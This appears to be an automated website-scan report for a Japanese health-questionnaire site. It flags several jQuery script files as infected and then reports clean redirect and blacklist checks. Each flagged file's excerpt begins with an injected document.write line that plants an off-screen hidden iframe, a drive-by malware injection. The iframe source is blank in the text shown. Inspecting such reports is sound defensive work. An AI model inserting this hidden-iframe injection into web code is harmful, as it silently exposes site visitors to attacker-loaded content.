Scanned pages/files
| Request | Server response | Status |
http://monshin.jp/ | 200 OK Content-Length: 13240 Content-Type: text/html | clean |
http://monshin.jp/js/jquery.js | 200 OK Content-Length: 57422 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(ty Antivirus reports:
| ||
http://monshin.jp/js/jquery.min.js | 200 OK Content-Length: 155660 Content-Type: text/javascript | clean |
http://monshin.jp/js/jquery.cookie.js | 200 OK Content-Length: 4414 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>'); jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (option for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; Antivirus reports:
| ||
http://monshin.jp/js/jquery.fontsizechange.js | 200 OK Content-Length: 2988 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>');(function($){ $(function(){ fontsizeChange(); }); function fontsizeChange(){ var changeArea = $(".changeArea"); var btnArea = $("#fontSize"); var changeBtn = btnArea.find(".changeBtn"); var fontSize = [100,116,131]; var ovStr = "_ov"; var active } }, function(){ mouseOut(); }); }); } changeBtn.click(function(){ var index = changeBtn.index(this); var self = $(this); cookieSet(index); sizeChange(); if(useImg){ mouseOut(); } if(!self.hasClass(activeClass)){ changeBtn.not(this).removeClass(activeClass); self.addClass(activeClass); } }); } })(jQuery); Antivirus reports:
| ||
http://monshin.jp/js/tab_change.js | 200 OK Content-Length: 1276 Content-Type: text/javascript | clean |
http://monshin.jp/body/metabolic-syndrome/metabolic-syndrome-check/ | 200 OK Content-Length: 19140 Content-Type: text/html | clean |
http://monshin.jp/js/jquery.screwdefaultbuttons.js | 200 OK Content-Length: 8579 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>'); (function($) { $.fn.screwDefaultButtons = function(options) { options = $.extend($.fn.screwDefaultButtons.defaults, options); var checkedImage = options.checked; var uncheckedImage = options.unchecked; var disabledImage = options.disabled; var $('.styledRadio').css({'cursor':'pointer', "background-repeat":"no-repeat"}); $('.styledCheckbox').css({'cursor':'pointer', "background-repeat":"no-repeat"}); } $.fn.screwDefaultButtons.defaults = { checked: "url(images/radio_Checked.jpg)", unchecked: "url(images/radio_Unchecked.jpg)", disabled: false, disabledChecked: false, selectAll: null, width: 20, height: 20 }; })(jQuery); Antivirus reports:
| ||
http://monshin.jp/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://monshin.jp/body/insomnia/insomnia-check/ | 200 OK Content-Length: 18494 Content-Type: text/html | clean |
http://monshin.jp/body/diabetes-mellitus/diabetes/ | 200 OK Content-Length: 17656 Content-Type: text/html | clean |
http://monshin.jp/body/diabetes-mellitus/diabetes-mellitus-check/ | 200 OK Content-Length: 18544 Content-Type: text/html | clean |
http://monshin.jp/body/hypertension/high-blood-check/ | 200 OK Content-Length: 16597 Content-Type: text/html | clean |
http://monshin.jp/body/asthma/asthma-check/ | 200 OK Content-Length: 15079 Content-Type: text/html | clean |
http://monshin.jp/body/pollakiuria-and-residualurine/prostatomegaly-check/ | 200 OK Content-Length: 19433 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: monshin.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:37:20 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:37:20 GMT; path=/
GET / HTTP/1.1
Host: monshin.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:37:20 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:37:20 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: monshin.jp
Referer: http://www.google.com/search?q=monshin.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: monshin.jp
Referer: http://www.google.com/search?q=monshin.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=monshin.jp
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://monshin.jp/
Result: monshin.jp is not infected or malware details are not published yet.
Result: monshin.jp is not infected or malware details are not published yet.